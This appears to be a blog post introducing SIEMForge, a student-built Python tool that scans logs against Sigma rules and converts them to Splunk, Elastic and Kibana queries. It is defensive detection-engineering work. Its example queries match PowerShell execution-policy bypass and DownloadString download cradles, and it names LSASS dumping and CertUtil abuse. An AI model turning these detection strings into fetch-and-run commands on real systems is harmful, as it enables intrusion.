You don't always have a full SIEM stack at your fingertips. Maybe you're a student spinning up a home lab, a junior SOC analyst triaging logs on a budget, or a pentester who just needs to check some Sysmon logs against known attack patterns. Standing up Splunk or Elastic just to run a few detection rules feels like overkill.
That's why I built SIEMForge — a portable detection toolkit that lets you scan logs against Sigma rules, convert detections to Splunk/Elastic/Kibana queries, validate rule syntax, and map your coverage to the MITRE ATT&CK framework. All from the command line. No SIEM required.
What SIEMForge Actually Does
At its core, SIEMForge is a Python CLI tool with four main capabilities:
1. Log Scanning Without a SIEM
Feed it a JSON, JSONL, syslog, or CSV log file and it executes Sigma detection rules against it locally:
python -m siemforge --scan /var/log/sysmon/events.json
It ships with 10 pre-built Sigma rules covering techniques like suspicious PowerShell downloads (T1059.001), LSASS memory dumps (T1003.001), CertUtil abuse (T1105), and scheduled task persistence (T1053.005).
2. Multi-Backend Rule Conversion
Need to move a Sigma rule into your production SIEM? SIEMForge converts to Splunk SPL, Elasticsearch Lucene, and Kibana KQL:
python -m siemforge --convert splunk rules/sigma/proc_creation_suspicious_powershell.yml
This spits out ready-to-paste queries. No manual translation, no syntax guessing.
3. Rule Validation
Before deploying rules to production, validate them:
python -m siemforge --validate rules/sigma/
This catches YAML formatting issues, missing required fields, and structural problems before they break your detection pipeline.
4. MITRE ATT&CK Coverage Mapping
Visualize which techniques your rule set covers:
python -m siemforge --mitre rules/sigma/
This is huge for gap analysis — you can immediately see where your detection coverage is thin.
A Closer Look: The Converter Architecture
The part I'm most proud of is the converter module. Each SIEM backend has its own translation layer under siemforge/converters/:
siemforge/converters/
├── splunk.py
├── elastic.py
└── kibana.py
Each converter takes a parsed Sigma rule (field mappings, detection logic, conditions) and outputs the target query language. The tricky part was handling Sigma's conditional logic — things like selection AND NOT filter with nested field conditions need to be properly parenthesized for each backend's syntax.
For example, a Sigma rule detecting suspicious PowerShell downloads becomes Splunk SPL like:
index=windows source="WinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
CommandLine="*powershell*" AND (CommandLine="*-ep bypass*" OR CommandLine="*DownloadString*")
But the same rule in Elasticsearch Lucene looks like:
event.code:1 AND process.command_line:(*powershell* AND (*-ep bypass* OR *DownloadString*))
Field names change, quoting rules change, wildcard syntax changes. The converter handles all of this.
Why I Built It
I'm a cybersecurity student, and I kept running into the same problem: I wanted to practice threat detection and log analysis, but every tutorial assumed you had a full Splunk or Elastic deployment. Setting up those stacks takes hours and eats resources on a student laptop.
SIEMForge lets me (and anyone else) practice detection engineering with just Python and a log file. It's the tool I wished existed when I started learning.
Getting Started
git clone https://github.com/TiltedLunar123/SIEMForge.git
cd SIEMForge
pip install pyyaml
python -m siemforge --scan samples/test_logs.json
The test suite has 138 tests if you want to poke around the internals:
pip install -r requirements-dev.txt
pytest tests/ -v
What's Next
I'm planning to add more Sigma rules, support additional log formats, and potentially add a web UI for the MITRE coverage matrix. If you're into detection engineering or just want a lightweight way to work with Sigma rules, give it a try and let me know what you think.
GitHub: https://github.com/TiltedLunar123/SIEMForge
If this is useful, drop a star — it helps more than you think.
Top comments (0)